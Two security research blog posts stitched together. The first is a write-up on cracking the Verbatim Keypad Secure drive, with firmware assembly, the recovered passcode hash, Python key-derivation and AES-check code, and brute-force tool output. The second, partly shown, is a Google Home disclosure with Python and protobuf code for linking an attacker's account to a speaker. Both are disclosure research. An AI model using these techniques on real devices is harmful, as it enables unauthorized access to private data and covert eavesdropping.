    mov_s   r13, 0x4000010c       ; read AES mode
    ldb_s   r0, [r13]
    bl      send_spi_byte

    mov_s   r12, 0                ; index
    ; mov_s   r13, 0x400001d0       ; AES key buffer address
    mov_s   r13, 0x40056904       ; AES key buffer address
    mov     r14, 32               ; loop count

send_data:
    ldb.ab  r0, [r13, 1]          ; load next byte
    add     r12, r12, 1
    bl      send_spi_byte

    sub     r14, r14, 1
    cmp_s   r14, 0
    bne     send_data
    b       continue
    
.align 4
send_spi_byte:
    mov_s   r3, 0x1
    mov_s   r2, 0x400503e0

    stb.di  r3, [r2, 0xf1]
    mov_s   r1, 0xee
    stb.di  r1, [r2, 0xe3]
    stb.di  r3, [r2, 0xe2]
    stb.di  r0, [r2, 0xe1]
send_spi_wait:
    ldb.di  r0,[r2, 0xf1]
    bbit0   r0, 0x0, send_spi_wait
    stb.di  r3,[r2, 0xf1]
    j_s     [blink]

continue:

How bytes can be sent via the SPI functionality of the INIC-3637EN was simply copied from another part of the analyzed firmware and reused in a slightly modified form.

Developed ARCompact assembly code for debugging purposes could be assembled using a corresponding GCC toolchain. The generated machine code could then be copied and pasted from the resulting ELF executable to a suitable location within the firmware image.

The following listing shows an example Makefile used during this research project.

PROJECT = debug
ASM = ./arc-snps-elf-as
ASMFLAGS = -mcpu=arc600
LD = ./arc-snps-elf-ld
LDFLAGS = --oformat=binary

$(PROJECT).bin: $(PROJECT).o
    $(LD) $(LDFLAGS) $(PROJECT).o -o $(PROJECT).bin

$(PROJECT).o: $(PROJECT).asm
    $(ASM) $(ASMFLAGS) $(PROJECT).asm -o $(PROJECT).o

clean:
    rm -f $(PROJECT).bin $(PROJECT).o

During the firmware analysis, it was also possible to find interesting artifacts contained within the firmware code that are also part of other device firmware, for example:

  1. Pi byte sequence (weird AES keys for other similar storage devices, e.g. ZALMAN ZM-VE500, as described in the publication Lost your “secure” HDD PIN? We can Help!)
  2. Magic signature ” INI” (0x494e4920)

The presence of different instances of the Pi byte sequence within the analyzed firmware is shown in the following Figure. Concerning other devices, these byte sequences were used to initialize AES key buffers. However, in case of the Verbatim Keypad Secure, they were not used.

Pi byte sequence used as AES keys in other device firmware

The following Figure shows a decompiled version of the identified unlock function with references to the magic signature ” INI” (0x494e4920).

Magic signature 0x494e4920 within the unlock function

As a firmware analysis solely based on reverse code engineering can be quite time-consuming for understanding the inner workings of a device, it is oftentimes a good idea to combine such a dead (static) approach with some kind of live (dynamic) approach for analysis purposes. During this research project, the ability to analyze the device firmware could fortunately be combined with a protocol analysis, which is described in the next section.

Protocol Analysis

The hardware design of the Verbatim Keypad Secure allowed for sniffing the SPI communication between the keypad controller and the USB-to-SATA bridge controller (INIC-3637EN). Here, further interesting patterns could be seen, as the following Figure showing sniffed SPI communication of an unlock command illustrates.

Sniffed SPI communication for unlock PIN pattern shown in logic analyzer

The following SPI commands could be identified:

  1. 0xE1: Initialize device
  2. 0xE2: Unlock device
  3. 0xE3: Lock device
  4. 0xE4: Unknown
  5. 0xE5: Change passcode
  6. 0xE6: Unknown

The identified message format for those commands is as follows:

Analyzed SPI message format

The used checksum of the SPI messages is a CRC-16 with XMODEM configuration. When a passcode is used within a command, for instance in case of the unlock command, all entered passcodes always result in a 32-byte-long payload, no matter how long the actual passcode was. Furthermore, the last 16 bytes of such a payload always consist only of 0xFF bytes, and within the first 16 bytes obvious patterns can be recognized.

For example, when a passcode consisting of twelve ones (i.e. 111111111111) was used, the payload shown in the following Figure was sent.

Obvious SPI payload patterns

The sequence of numbers 1111 always resulted in the byte sequence 0A C9 1F 2F, and by testing other sequences of numbers, other resulting byte sequences could be observed. Thus, some kind of hashing or mapping is used for the user input in form of a numerical passcode. Unfortunately, the keypad controller chip with this algorithm was a black box during this research project.

So there were the following two ideas for a black box analysis:

  1. Find out the used hashing algorithm by collecting more hash samples for 4-digit inputs and analyzing them
  2. Hardware brute-force attack for generating all possible hashes for 4-digit inputs in order to create a lookup table

The following Table shows some examples of 4-digit inputs and the resulting 32-bit hashes.

4-digit input | 32-bit hash
0000     | 4636B9C9
1111     | 0AC91F2F
2222     | 5EC8BD1E
3333     | 624E6000
4444     | B991063F
5555     | 0A05D514
6666     | 7E657A68
7777     | B1C9C3BA
8888     | 7323CC76
9999     | 523DA5F5
1234     | E097BCF8
5678     | F540AEF4
no input | 956669AD

The first approach, manually collecting more hash samples and trying out different hash algorithms, was not successful after investing some time. Thus, the second approach of using a hardware brute-force attack for collecting all possible hashes was followed. However, there were some other problems, concerning how the keypad works: it was not as simple to automatically generate key presses as initially assumed.

The following Figure shows the observed encoding of all possible keys of the keypad in a logic analyzer.

Encoding of all possible keys of the keypad

The corresponding pinout of the keypad controller according to my analysis is shown in the following Figure.

Keypad controller pinout according to our analysis

For automatically collecting all possible hashes of 4-digit inputs, the keypad controller was desoldered from the PCB and put on a breakout board. This breakout board was then put on a breadboard together with a Teensy USB development board. Then, a keypad brute-forcer for the Teensy was developed for simulating key presses. This worked for all keys but the unlock key. Thus, the desired SPI communication between the keypad controller and the USB-to-SATA bridge controller could not be triggered via a simulated unlock key press.

Pin 7 of the keypad controller also seems to get triggered when the unlock key is pressed, and the USB-to-SATA bridge controller initiates SPI communication with the keypad controller shortly afterwards. After some failed attempts to replicate this behavior, I switched back to the first approach for the black box analysis in an act of frustration.

Hash Function Analysis

Thus, I again tried to find some more information in the World Wide Web about this unknown hash or mapping algorithm. And luckily, this time I actually found something using the hash 4636B9C9 for the 4-digit input of 0000, as the following Figure shows.

Search results for the search term 4636B9C9 in DuckDuckGo

And this Reddit post in dailyprogrammer_ideas titled [Intermediate/Hard] Integer hash function interpreter had the solution I was looking for, as shown in the following Figure.

Reddit post with the integer hash algorithm hash32shift2002

The unknown hash algorithm is an integer hash function called hash32shift2002 in this post. This integer hash function was created by Thomas Wang, and a C implementation looks as follows:

uint32_t hash32shift2002(uint32_t hash) {
    hash += ~(hash << 15);
    hash ^=  (hash >> 10);
    hash +=  (hash <<  3);
    hash ^=  (hash >>  6);
    hash += ~(hash << 11);
    hash ^=  (hash >> 16);
    return hash;
}
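Re-implementing this in Python makes it easy to precompute a lookup table for all 4-digit inputs. The 4-digit input is apparently interpreted as a decimal integer: hash32shift2002(0) yields 0x4636B9C9, which matches the table row for the input 0000.

# Re-implementation of hash32shift2002 in Python and a reverse lookup
# table for all 10,000 possible 4-digit keypad inputs.

MASK = 0xFFFFFFFF  # emulate 32-bit unsigned arithmetic

def hash32shift2002(h: int) -> int:
    h = (h + (~(h << 15) & MASK)) & MASK
    h ^= h >> 10
    h = (h + (h << 3)) & MASK
    h ^= h >> 6
    h = (h + (~(h << 11) & MASK)) & MASK
    h ^= h >> 16
    return h

# hash -> 4-digit input, e.g. lookup[0x4636B9C9] == "0000"
lookup = {hash32shift2002(i): f"{i:04d}" for i in range(10000)}
assert lookup[0x4636B9C9] == "0000"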

Now, the last missing puzzle piece was how and where user authentication data was stored and used.

User Authentication

The Verbatim Keypad Secure USB flash drive uses a passcode-based user authentication for unlocking the storage device containing the user data. So open questions were how this passcode comparison is actually done, and whether it was vulnerable to some kind of attack.

Due to previous research of similar devices, an educated guess was that information used for the authentication process is stored on the SSD. This could be verified by setting different passcodes and analyzing changes concerning the SSD content: a special block (number 125042696 on the used 64 GB test devices) is used for storing authentication information, and its content consistently changed with the set passcode. Furthermore, the firmware analysis showed that the first 112 bytes (0x70) of this special block are used when unlocking the device. And when the AES engine of the USB-to-SATA bridge controller INIC-3637EN is configured correctly concerning the operation mode and the cryptographic key, the first four bytes of the decrypted special block have to match the magic signature ” INI” (0x494e4920) mentioned in previous sections.

The following output exemplarily shows the encrypted content of this special block of the SSD.

# dd if=/dev/sda bs=512 skip=125042696 count=1 of=ciphertext_block.bin
1+0 records in
1+0 records out
512 bytes copied, 0.408977 s, 1.3 kB/s

# hexdump -C ciphertext_block.bin
00000000  c3 f7 d5 4d df 70 28 c1  e3 7e 92 08 a8 57 3e d8  |...M.p(..~...W>.|
00000010  f1 5c 3d 3c 71 22 44 c3  97 19 14 fd e6 3d 76 0b  |.\=<q"D......=v.|
00000020  63 f6 2a e3 72 8c dd 30  ae 67 fd cf 32 0b bf 3f  |c.*.r..0.g..2..?|
00000030  da 95 bc bb cc 9f f9 49  5e f7 4c 77 df 21 5c f4  |.......I^.Lw.!\.|
00000040  c3 35 ee c0 ed 9e bc 88  56 bd a5 53 4c 34 6e 2e  |.5......V..SL4n.|
00000050  61 06 49 08 9a 16 20 b7  cb c6 f8 f5 dd 6d 97 e6  |a.I... ......m..|
00000060  3c e7 1d 8e f8 e9 c6 07  5d fa 1a 8e 67 59 61 d1  |<.......]...gYa.|
00000070  6b a1 05 23 d3 0e 7b 61  d4 90 aa 33 26 6a 6c f9  |k..#..{a...3&jl.|
*
00000100  fe 82 1c 5e 9a 4b 16 81  f7 86 48 be d9 a5 a1 7b  |...^.K....H....{|
*
00000200

By further debugging the device firmware, it could be determined that the AES key for decrypting this special block is the 32-byte payload sent from the keypad controller to the USB-to-SATA bridge controller INIC-3637EN, described in the protocol analysis. However, the AES engine of the INIC-3637EN uses the AES key in a special byte order where the first 16 bytes and the last 16 bytes are each reversed.

The following Python code illustrates how the actual AES key is generated from the 32-byte payload of the SPI command sent by the keypad controller to the INIC-3637EN:

AES_key = passcode_key[0:16][::-1] + passcode_key[16:32][::-1]

As the information for the user authentication is stored in a special block on the SSD, and the AES key derivation from the user input (passcode) using the integer hash function hash32shift2002 is known, it is possible to perform an offline brute-force attack against the passcode-based user authentication of the Verbatim Keypad Secure. And because only 5 to 12 digit long passcodes are supported, the search space of valid passcodes is relatively small.
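A minimal sketch of the core verification step of such an offline attack, assuming AES-256-ECB for decrypting the special block (the exact operation mode is not spelled out above); passcode_key is the 32-byte payload the keypad controller would send for a candidate passcode, derived via hash32shift2002 as described:

# Minimal sketch of the offline passcode check, assuming AES-256-ECB.
from Crypto.Cipher import AES  # pip install pycryptodome

MAGIC = b" INI"  # magic signature " INI" (0x494e4920)

def check_passcode(passcode_key: bytes, special_block: bytes) -> bool:
    # the INIC-3637EN uses the key with both 16-byte halves reversed
    aes_key = passcode_key[0:16][::-1] + passcode_key[16:32][::-1]
    plaintext = AES.new(aes_key, AES.MODE_ECB).decrypt(special_block[:112])
    return plaintext.startswith(MAGIC)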

Therefore, the software tool Verbatim Keypad Secure Cracker was developed, which can find the correct passcode in order to gain unauthorized access to the encrypted user data of a Verbatim Keypad Secure USB flash drive.

The following output exemplarily illustrates a successful brute-force attack.

# ./vks-cracker /dev/sda
 █████   █████ █████   ████  █████████       █████████                               █████
░░███   ░░███ ░░███   ███░  ███░░░░░███     ███░░░░░███                             ░░███
 ░███    ░███  ░███  ███   ░███    ░░░     ███     ░░░  ████████   ██████    ██████  ░███ █████  ██████  ████████
 ░███    ░███  ░███████    ░░█████████    ░███         ░░███░░███ ░░░░░███  ███░░███ ░███░░███  ███░░███░░███░░███
 ░░███   ███   ░███░░███    ░░░░░░░░███   ░███          ░███ ░░░   ███████ ░███ ░░░  ░██████░  ░███████  ░███ ░░░
  ░░░█████░    ░███ ░░███   ███    ░███   ░░███     ███ ░███      ███░░███ ░███  ███ ░███░░███ ░███░░░   ░███
    ░░███      █████ ░░████░░█████████     ░░█████████  █████    ░░████████░░██████  ████ █████░░██████  █████
     ░░░      ░░░░░   ░░░░  ░░░░░░░░░       ░░░░░░░░░  ░░░░░      ░░░░░░░░  ░░░░░░  ░░░░ ░░░░░  ░░░░░░  ░░░░░
 ... finds out your passcode.

Verbatim Keypad Secure Cracker v0.5 by Matthias Deeg <matthias.deeg@syss.de> (c) 2022
---
[*] Found 4 CPU cores
[*] Reading magic sector from device /dev/sda
[*] Found a plausible magic sector for Verbatim Keypad Secure (#49428)
[*] Initialize passcode hash table
[*] Start cracking ...
[+] Success!
    The passcode is: 99999999

This found security vulnerability was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-001 with the assigned CVE ID CVE-2022-28384.

You can also find a demonstration of this attack in our SySS PoC video Hacking a Secure USB Flash Drive.

Summary

In this article, the research results leading to four different security vulnerabilities concerning the Verbatim Keypad Secure USB flash drive listed in the following Table were presented.

Product | Vulnerability Type | SySS ID | CVE ID
Verbatim Keypad Secure | Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) | SYSS-2022-001 | CVE-2022-28384
Verbatim Keypad Secure | Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) | SYSS-2022-002 | CVE-2022-28382
Verbatim Keypad Secure | Missing Immutable Root of Trust in Hardware (CWE-1326) | SYSS-2022-003 | CVE-2022-28383
Verbatim Keypad Secure | Expected Behavior Violation (CWE-440) | SYSS-2022-004 | CVE-2022-28386

Those results show that new portable storage devices with old security issues are still produced and sold.

In the next part of this blog series, research results concerning another secure USB flash drive are covered.

Turning Google smart speakers into wiretaps for $100k

Turning Google smart speakers into wiretaps for $100k

Original text by Matt Kunze

Summary

I was recently rewarded a total of $107,500 by Google for responsibly disclosing security issues in the Google Home smart speaker that allowed an attacker within wireless proximity to install a “backdoor” account on the device, enabling them to send commands to it remotely over the Internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN (which could potentially expose the Wi-Fi password or provide the attacker direct access to the victim’s other devices). These issues have since been fixed.

(Note: I tested everything on a Google Home Mini, but I assume that these attacks worked similarly on Google’s other smart speaker models.)

Investigation

I was messing with the Google Home and noticed how easy it was to add new users to the device from the Google Home app. I also noticed that linking your account to the device gives you a surprising amount of control over it.

Namely, the “routines” feature allows you to create shortcuts for running a series of other commands (e.g. a “good morning” routine that runs the commands “turn off the lights” and “tell me about the weather”). Through the Google Home app, routines can be configured to start automatically on your device on certain days at certain times. Effectively, routines allow anyone with an account linked to the device to send it commands remotely. In addition to remote control over the device, a linked account also allows you to install “actions” (tiny applications) onto it.

When I realized how much access a linked account gives you, I decided to investigate the linking process and determine how easy it would be to link an account from an attacker’s perspective.

So… how would one go about doing that? There are a bunch of different routes to explore when reverse engineering an IoT device, including (but not limited to):

  1. Obtaining the device’s firmware by dumping it or downloading it from the vendor’s website
  2. Static analysis of the app that interfaces with the device (in this case, the “Google Home” Android app), e.g. using Apktool or JADX to decompile it
  3. Dynamic analysis of the app during runtime, e.g. using Frida to hook Java methods and print info about internal state
  4. Intercepting the communications between the app and the device (or between the app/device and the vendor’s servers) using a “man-in-the-middle” (MITM) attack

Obtaining firmware is particularly difficult in the case of Google Home because there are no debugging/flashing pins on the device’s PCB so the only way to read the flash is to desolder the NAND chip. Google also does not publicly provide firmware image downloads. As shown at DEFCON though, it is possible.

However, in general, when reverse engineering things, I like to start with a MITM attack if possible, since it’s usually the most straightforward path to gaining some insight into how the thing works. Typically IoT devices use standard protocols like HTTP or Bluetooth for communicating with their corresponding apps. HTTP in particular can be easily snooped using tools like mitmproxy. I love mitmproxy because it’s FOSS, has a nice terminal-based UI, and provides an easy-to-use Python API.

Since the Google Home doesn’t have its own display or user interface, most of its settings are controlled through the Google Home app. A little Googling revealed that some people had already begun to document the local HTTP API that the device exposes for the Google Home app to use. Google Cast devices (including Google Homes and Chromecasts) advertise themselves on the LAN using mDNS, so we can use dns-sd to discover them:

$ dns-sd -B _googlecast._tcp
Browsing for _googlecast._tcp
DATE: ---Fri 05 Aug 2022---
15:30:15.526  ...STARTING...
Timestamp     A/R    Flags  if Domain               Service Type         Instance Name
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Chromecast-997113e3cc9fce38d8284cee20de6435
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Nest-Hub-d5d194c9b7a0255571045cbf615f7ffb
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Home-Mini-f09088353752a2e56bddbb2a27ec377

We can use nmap to find the port that the local HTTP API is running on:

$ nmap 192.168.86.29
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-05 15:41
Nmap scan report for google-home-mini.lan (192.168.86.29)
Host is up (0.0075s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
8008/tcp  open  http
8009/tcp  open  ajp13
8443/tcp  open  https-alt
9000/tcp  open  cslistener
10001/tcp open  scp-config

We see HTTP servers on ports 8008 and 8443. According to the unofficial documentation I linked above, 8008 is deprecated and only 8443 works now. (The other ports are for Chromecast functionality, and some unofficial documentation for those is available elsewhere on the Internet.) Let’s try issuing a request:

$ curl -s --insecure https://192.168.86.29:8443/setup/eureka_info?params=settings
{"settings":{"closed_caption":{},"control_notifications":1,"country_code":"US","locale":"en-US","network_standby":0,"system_sound_effects":true,"time_format":1,"timezone":"America/Chicago","wake_on_cast":1}}

(We use --insecure because the device sends a self-signed certificate, which the Google Home app is configured to trust, but my computer is not.)

Ok, we got the device’s settings. However, the docs say that most API endpoints require a cast-local-authorization-token. Let’s try something more interesting, rebooting the device:

$ curl -i --insecure -X POST -H 'Content-Type: application/json' -d '{"params":"now"}' https://192.168.86.29:8443/setup/reboot
HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers:Content-Type
Cache-Control:no-cache
Content-Length:0

Indeed, it’s rejecting the request because we’re not authorized. So how do we get the token? Well, the docs say that you can either extract it from the Google Home app’s private app data directory (if your phone is rooted), or you can use a script that takes your Google username and password as input, calls the API that the Google Home app internally uses to get the token, and returns the token. Both of these methods require that you have an account that’s already been linked to the device, though, and I wanted to figure out how the linking happens in the first place. Presumably, this token is being used to prevent an attacker (or malicious app) on the LAN from accessing the device. Therefore, it surely takes more than just basic LAN access to link an account and get the token, right…? I searched the docs but there was no mention of account linking. So I proceeded to investigate the matter myself.

Setting up the proxy

Intercepting unencrypted HTTP traffic with mitmproxy on Android is as simple as starting the proxy server then configuring your phone (or just the target app) to route all of its traffic through the proxy. However, the unofficial local API documentation said that Google had recently started using HTTPS. Also, I wanted to be able to intercept not only the traffic between the app and the Google Home device, but also between the app and Google’s servers (which is definitely HTTPS). I thought that since the linking process involved Google accounts, parts of the process might happen on the Google server, rather than on the device.

Intercepting HTTPS traffic on Android is a little trickier, but usually not terribly difficult. In addition to configuring the proxy settings, you also need to make the app trust mitmproxy’s root CA certificate. You can install new CAs through Android Settings, but annoyingly, as of Android 7, apps using the system-provided networking APIs will no longer automatically trust user-added CAs. If you have a rooted Android phone, you can modify the system CA store directly (located at /system/etc/security/cacerts). Alternatively, you could manually patch the individual app. However, sometimes even that isn’t enough, as some apps employ “SSL pinning” to ensure that the certificate used for SSL matches the one they were expecting. If the app uses the system-provided pinning APIs (javax.net.ssl) or uses a popular HTTP library (e.g. OkHttp), it’s not hard to bypass; just hook the relevant methods with Frida or Xposed. While Xposed and the full version of Frida both require root, Frida Gadget can be used without root. If the app is using a custom pinning mechanism, you’ll have to reverse engineer it and manually patch it out.

Patching and repacking the Google Home app isn’t an option because it uses Google Play Services OAuth APIs (which means the APK needs to be signed by Google or it’ll crash), so root access is necessary to intercept its traffic. Since I didn’t want to root my primary phone, and emulators tend to be clunky, I decided to use an old spare phone I had lying around. I rooted it using Magisk and modified the system CA store to include mitmproxy’s CA, but this wasn’t sufficient as the Google Home app appeared to be utilizing SSL pinning. To bypass the pinning, I used a Frida script I found on GitHub.

I could now see all of the encrypted traffic showing up in mitmproxy:

Even the traffic between the app and device was being captured. Cool!

Alright, so let’s observe what happens when a new user links their account to the device. I already had my primary Google account linked, so I created a new account as the “attacker”. When I opened the Google Home app and signed in under the new account (making sure I was connected to the same Wi-Fi network as the device), the device showed up under “Other devices”, and when I tapped on it, I was greeted with this screen:

I pressed the button and it prompted me to install the Google Search app to continue. I guess the Voice Match setup is done through that app instead. But as an attacker I don’t care about adding my voice to the device; I only want to link my account. So is it possible to link an account without Voice Match? I thought that it must be, since the initial device setup was done entirely within the Home app, and I wasn’t required to enable Voice Match on my primary account. I was about to perform a factory reset and observe the initial account link, but then I realized something.

Much of the internal architecture of Google Home is shared with Chromecast devices. According to a DEFCON talk, Google Home devices use the same operating system as Chromecasts (a version of Linux). The local API seems to be similar, too. In fact, the Home app’s package name ends with chromecast.app, and it used to just be called “Chromecast”. Back then, its only function was to set up Chromecast devices. Now it’s responsible for setting up and managing not just Chromecasts, but all of Google’s smart home devices.

Anyway, why not just try observing how the Chromecast link process works, then try to replicate it for use with the Google Home? It’s bound to be simpler, because Chromecasts don’t support Voice Match (nor the Google Assistant, for that matter). Luckily, I also had a few Chromecasts lying around. I plugged in one and found it within the Home app:

All I had to do was tap the “Enable voice control and more” banner and confirm, and then my account was linked! Ok, let’s see what happened on the network side:

We see a POST request to a /deviceuserlinksbatch endpoint on clients3.google.com:

It’s a binary payload, but we can immediately see that it contains some device details (e.g. the device’s name, “Office TV”). We see that the content-type is application/protobuf. Protocol Buffers is Google’s binary data serialization format. Like JSON, data is stored in pairs of keys and values. The client and server exchanging protobuf data both have a copy of the .proto file, which defines the field names and data types (e.g. uint32, bool, string, etc.). During the encoding process, this data is stripped out, and all that remains are the field numbers and wire types. Fortunately, the wire types translate pretty directly back to the original data types (there are usually only a few possibilities as to what the original data type could have been based on the wire type). Google provides a command-line tool called protoc that allows us to encode and decode protobuf data. The --decode_raw option tells protoc to decode without the .proto file by guessing what the data types are. This raw decoding is usually enough to understand the data structure, but if it doesn’t look right, you could create your own .proto with your data type guesses, try to decode, and if it still doesn’t make sense, keep adjusting the .proto until it does.

In our case, --decode_raw produces a perfectly readable output:

$ protoc --decode_raw < deviceuserlinksbatch
1 {
  1: "590C[...]"
  2: "MIIDojCCAoqgAwIBAgIEVcQZjzANBgkqhkiG9w0BAQUFADB5MQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNTW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzENMAsGA1UECwwEQ2FzdDEZMBcGA1UEAwwQQ2hyb21lY2FzdCBJQ0EgMzAeFw0xNTA4MDcwMjM1NTlaFw0zNTA4MDIwMjM1NTlaMHwxEzARBgNVBAoMCkdvb2dsZSBJbmMxDTALBgNVBAsMBENhc3QxFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRwwGgYDVQQDDBMzVzM3OTkgRkE4RkNBMzJDRjBEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAleog/oEXK6PKyGHDIYcDwT2Xl8GLOFuhxQh/K+dTahxex9+4mLAXx5v2s75Iwv9jcXEpD5NTvjNXx20B0/rfpYORHbcm3UEwFWGnP5uvKIyLar+rC7Az5ZPzPXMx7xX6Br68/gOXMGJd17OG/m0rduBZNjmasBb7+Zu8jS38cv+N3S7yTobJbagrHxIufa7gX+rO2f3/jF2EutgcA4lIm5r/2J34fkYTMXnxElJCUv/b1COuk0FZTei4mooJ+TvcQE2ljgHOSvzGnZuT+QWch8TyRjIjKuIK4dB1UIcSvmQoq9PTbfzWCTcW1fREdPtnta6pyWIzmoJ9+3AhVnWAhwIDAQABoy8wLTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjANBgkqhkiG9w0BAQUFAAOCAQEAv11SILN9BfcUthEFq/0NJYnNIFoza21T1BR9qYymFKtUGOplFav00drHziTzUUCNUzbLGnR/yKXxXYlgUOlscEIHxN0+11tvWslHQk7Xgz2RUerBXy9l+vSwp87F8YVECny8lMFZi0T6hHUvtuM6O9qovQKS6ORx3GmZKlNOsNspPnF8IVpN+KtIiopL6vf84iCpbx+dQoOfUOZsbZ+XSxwT34yeNFXqdAIFwP1maMmPZZYnQrDYyUdyowYzk48fDG2QDhFf7dLjtCngcQ83MWWU5nx9On67hnj2VeFGKWsner4cwjs0+iVafUGiWD0tZejVXHSrR7TBouqOf9eG6Q=="
  6: "Office TV"
  7: "b"
  8: 0
  9 {
    1: 1
    2: 0
  }
  10: 2
  12: 0
}

Looks like the link request payload mainly consists of three things: device name, certificate, and “cloud ID”. I quickly recognized these values from the earlier /setup/eureka_info local API requests. So it appears that the link process is:

  1. Get the device’s info through its local API
  2. Send a link request to the Google server along with this info

I wanted to use mitmproxy to re-issue a modified version of the request, replacing my Chromecast’s info with the Google Home’s info. I would eventually want to create a .proto file so I could use protoc --encode to create link requests from scratch, but at that point I just wanted to quickly test to see if it would work. I figured I could replace any strings in the binary payload without causing any problems as long as they were the same length. The cloud ID and cert were the same lengths, but the name (“Office speaker”) was not, so I renamed the device in the Home app to make it that way. Then I issued the modified request, and it appeared to work. The Google Home’s settings were unlocked in the Home app. Behind the scenes, I saw in mitmproxy that the device’s local auth token was being sent along with local API requests.

Python re-implementation

The next thing I wanted to do is re-implement the link process with a Python script so I didn’t have to bother with the Home app any more.

To get the required device info, we just need to issue a request like:

GET https://[Google Home IP]:8443/setup/eureka_info?params=name,device_info,sign

Re-implementing the actual link request was a tad harder. First I examined the script mentioned by the unofficial local API docs that calls Google’s cloud APIs. It uses a library called gpsoauth which implements Android’s Google login flow in Python. Basically, it turns your Google username and password into OAuth tokens, which can be used to call undocumented Google APIs. It’s being used by some unofficial Python clients for Google services, like gkeepapi for Google Keep.
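In a nutshell, using gpsoauth looks roughly like this; the service scope and client signature shown here are placeholders that would have to be taken from intercepted traffic, not the real values used by the Home app:

# Rough sketch of the gpsoauth flow (pip install gpsoauth). Service scope
# and client signature are placeholders.
import gpsoauth

email, password, android_id = "user@example.com", "password", "0123456789abcdef"

master = gpsoauth.perform_master_login(email, password, android_id)
auth = gpsoauth.perform_oauth(
    email, master["Token"], android_id,
    service="oauth2:https://www.googleapis.com/auth/placeholder-scope",  # placeholder
    app="com.google.android.apps.chromecast.app",
    client_sig="placeholder-signature",  # placeholder
)
token = auth["Auth"]  # used as "Authorization: Bearer <token>"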

I used mitmproxy and gpsoauth to figure out and re-implement the link request. It looks like this:

POST https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b

Authorization: Bearer [token from gpsoauth]
[...some uninteresting headers added by the Home app...]
Content-Type: application/protobuf

[device info protobuf payload, described earlier]
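Re-issuing the link request from Python is then just an HTTP POST. A sketch using the requests library, with the header set reduced to the essentials and the protobuf payload pre-encoded (e.g. with protoc, as described next):

# Sketch: issuing the link request with a gpsoauth token and a
# pre-encoded protobuf payload.
import requests

URL = "https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b"

def link_device(token: str, payload: bytes) -> int:
    response = requests.post(
        URL,
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/protobuf",
        },
        data=payload,
    )
    return response.status_code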

To create the protobuf payload, I made a simple .proto file for the link request so I could use protoc --encode. I gave the fields I knew descriptive names (e.g. device_name), and the unknown fields generic names:

syntax = "proto2";

message LinkDevicePayload {
    message Payload {
        message Data {
            required uint32 i1 = 1;
            required uint32 i2 = 2;
        }
        required string device_id = 1;
        required string device_cert = 2;
        required string device_name = 6;
        required string s7 = 7;
        required uint32 i8 = 8;
        required Data d = 9;
        required uint32 i10 = 10;
        required uint32 i12 = 12;
    }
    required Payload p = 1;
}

As a basic smoke test, I used this .proto to encode a message with the same values as the message I captured from the Home app, and made sure that the binary output was the same.
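That smoke test is easy to script (a sketch; link.proto is the file above, captured_request.bin is a hypothetical dump of the mitmproxy-captured body, and the string values are truncated placeholders for the real cloud ID and certificate):

import subprocess

# Textproto with the same values as the captured message (placeholders here).
TEXTPROTO = b"""
p {
  device_id: "590C..."                        # truncated cloud ID placeholder
  device_cert: "MIIDojCCAoqgAwIBAgIEVcQZ..."  # truncated certificate placeholder
  device_name: "Office TV"
  s7: "b"
  i8: 0
  d { i1: 1 i2: 0 }
  i10: 2
  i12: 0
}
"""

# protoc --encode serializes a textproto from stdin into the binary wire format.
encoded = subprocess.run(
    ["protoc", "--encode=LinkDevicePayload", "link.proto"],
    input=TEXTPROTO, capture_output=True, check=True,
).stdout

# The smoke test: byte-for-byte identical to the captured request body.
assert encoded == open("captured_request.bin", "rb").read()
open("link_request.bin", "wb").write(encoded)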

Putting it all together, I had a Python script that takes your Google credentials and an IP address as input and uses them to link your account to the Google Home device at the provided IP.
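The core of such a script might look roughly like this (a sketch, not the author’s actual code: perform_master_login and perform_oauth are gpsoauth’s real API, but the service, app and client_sig values shown here are assumptions, and link_request.bin is the payload produced by the smoke test above):

import gpsoauth
import requests

EMAIL, PASSWORD = "attacker@example.com", "..."
ANDROID_ID = "0123456789abcdef"

# Exchange Google credentials for a master token, then an OAuth token.
master = gpsoauth.perform_master_login(EMAIL, PASSWORD, ANDROID_ID)
auth = gpsoauth.perform_oauth(
    EMAIL, master["Token"], ANDROID_ID,
    service="oauth2:https://www.googleapis.com/auth/homegraph",  # assumed scope
    app="com.google.android.apps.chromecast.app",                # Home app package
    client_sig="...",                                            # app signing cert hash
)

# Send the link request with the protobuf payload built from eureka_info.
payload = open("link_request.bin", "rb").read()
resp = requests.post(
    "https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b",
    headers={
        "Authorization": f"Bearer {auth['Auth']}",
        "Content-Type": "application/protobuf",
    },
    data=payload,
)
print(resp.status_code)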

Further investigation

Now that I had my Python script, it was time to think from the perspective of an attacker. Just how much control over the device does a linked account give you, and what are some potential attack scenarios? I first targeted the routines feature, which allows you to execute voice commands on the device remotely. Doing some more research into previous attacks on Google Home devices, I encountered the “Light Commands” attack, which provided some inspiration for coming up with commands that an attacker might use:

  • Control smart home switches
  • Open smart garage doors
  • Make online purchases
  • Remotely unlock and start certain vehicles
  • Open smart locks by stealthily brute forcing the user’s PIN number

